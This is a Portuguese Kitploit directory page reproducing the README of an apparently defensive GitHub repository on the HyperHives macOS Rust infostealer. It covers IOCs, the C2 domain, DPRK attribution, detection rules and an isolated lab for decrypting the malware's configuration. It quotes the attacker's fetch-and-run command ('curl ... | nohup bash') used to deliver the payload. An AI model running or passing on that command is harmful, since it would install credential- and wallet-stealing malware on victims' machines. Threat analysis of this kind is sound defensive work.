Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
hyperhives-macos-infostealer-analysis — Análise estática completa do infostealer HyperHives macOS Rust — 571 valores de configuração descriptografados, infraestrutura C2, atribuição DPRK/Contagious Interview, regras YARA/Sigma, pacote STIX 2.1, camada ATT&CK Navigator | Kitploit
Ferramentas/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Gerenciamento de Indicadores de Comprometimento (IOC)OSINT (Inteligência de Fontes Abertas)Engenharia ReversaAnálise ForenseAnálise de MalwareInteligência de AmeaçasPapers e PesquisaAprendizado e EducaçãoRecursos Curados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Análise estática completa do infostealer HyperHives macOS Rust — 571 valores de configuração descriptografados, infraestrutura C2, atribuição DPRK/Contagious Interview, regras YARA/Sigma, pacote STIX 2.1, camada ATT&CK Navigator

Ver RepositórioSite
31412há 5 mesesRevisado pelo Kitploit
Compartilhar

HyperHives macOS Infostealer — Análise Técnica Completa

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Inteligência de ameaças: Infostealer binário universal para macOS baseado em Rust, entregue através de um falso processo de entrevista de emprego no Wellfound (antigo AngelList). A persona do operador "Felix" da "HyperHive" atraiu alvos para executar um instalador malicioso de macos.hyperhives.net. Este repositório documenta a análise estática completa: 571 valores de configuração criptografados recuperados, incluindo URLs de C2, um Sentry DSN e 276 IDs de extensões do Chrome visadas.

SHA-256 da Amostra5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
Domínio C2cloudproxy.link
Domínio de Entregamacos.hyperhives.net
Plataforma de IscaWellfound (antigo AngelList)
Persona do Operador"Felix" na "HyperHive"
VirusTotal9 / 63 detecções
ClassificaçãoDivulgação pública / pacote IOC
Última atualizaçãoAbril de 2026

Conteúdo

  • Pacotes de inteligência de ameaças
  • Estrutura do repositório
  • Início rápido
  • TL;DR
  • 1 — Como começou
  • 2 — O binário
  • 3 — O que ele rouba
  • 4 — Infraestrutura C2 decifrada
  • 5 — Atribuição
  • 6 — Criptoanálise
  • 7 — Mapeamento MITRE ATT&CK
  • 8 — Referência de carteiras e IDs de extensão
  • 9 — Ações recomendadas
  • 10 — Metodologia
  • Apêndice A — Todos os 276 IDs de extensões Chrome
  • Escopo e limitações
  • Histórico de versões
  • Contribuindo
  • Licença

Pacotes de inteligência de ameaças

ArquivoFormatoFinalidade
iocs.txtTexto simplesHashes, domínios, URLs, IPs, e-mail, IDs Sentry — cole em listas de bloqueio, MISP, OpenCTI
yara_rules.yarYARA 4.2+Correspondência de hash de amostra conhecida + detecções heurísticas de string para Mach-O
sigma_rules.ymlSigmaRegras de proxy, DNS e criação de processos — ajuste logsource para seu SIEM
stix/bundle.jsonSTIX 2.1Pacote CTI legível por máquina com indicadores, SDO de malware, infraestrutura, padrões ATT&CK e relacionamentos
attack-navigator-layer.jsonATT&CK NavigatorImporte para o ATT&CK Navigator para cobertura visual de técnicas

Estrutura do repositório```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

## Início rápido

Coloque a amostra como `sample/installer_binary` (veja [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) para verificação de hash), em seguida:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

O arquivo compose impõe network_mode: none, read_only: true, e elimina todas as capacidades do Linux. Consulte SECURITY.md para diretrizes completas de tratamento.


TL;DR

Uma postagem de emprego no Wellfound (antigo AngelList) levou a uma cadeia de engenharia social de múltiplos e-mails, originada de uma persona operacional "Felix" na "HyperHive". Após elogiar a formação técnica do alvo e agendar uma entrevista falsa, o atacante direcionou a vítima para "revisar o produto" em hyperhives.net e especificamente examinar Settings → Diagnostics → Log — um pretexto para acionar a execução de:``` curl -s https://macos.hyperhives.net/install | nohup bash &

O payload é um **binário universal Mach-O de 8,5 MB** (x86_64 + arm64) compilado em Rust. A análise estática com um laboratório Docker isolado e emulação de CPU de **570 rotinas auxiliares x86_64 únicas** recuperou **todos os 571 valores de configuração criptografados**, expondo:

- **C2:** `cloudproxy.link` — quatro endpoints HTTPS
- **Sentry (pivô de atribuição):** DSN completo com IDs de org/projeto em `ingest.de.sentry.io`
- **Identidade da build:** usuário Cargo `rootr`, codinome `force`, versão `9.12.1`
- **Alvos:** 276 IDs de extensões Chrome (carteiras cripto, gerenciadores de senhas, credenciais corporativas)

As táticas estão alinhadas com campanhas **Contagious Interview vinculadas à RPDC** — recrutamento falso em plataformas legítimas, construção de confiança em várias etapas, entrega `curl | bash`, stealer Rust para macOS e exfiltração focada em criptomoedas.

---

## 1 — Como começou

### A isca: entrevista de emprego falsa no Wellfound
Baixar ferramenta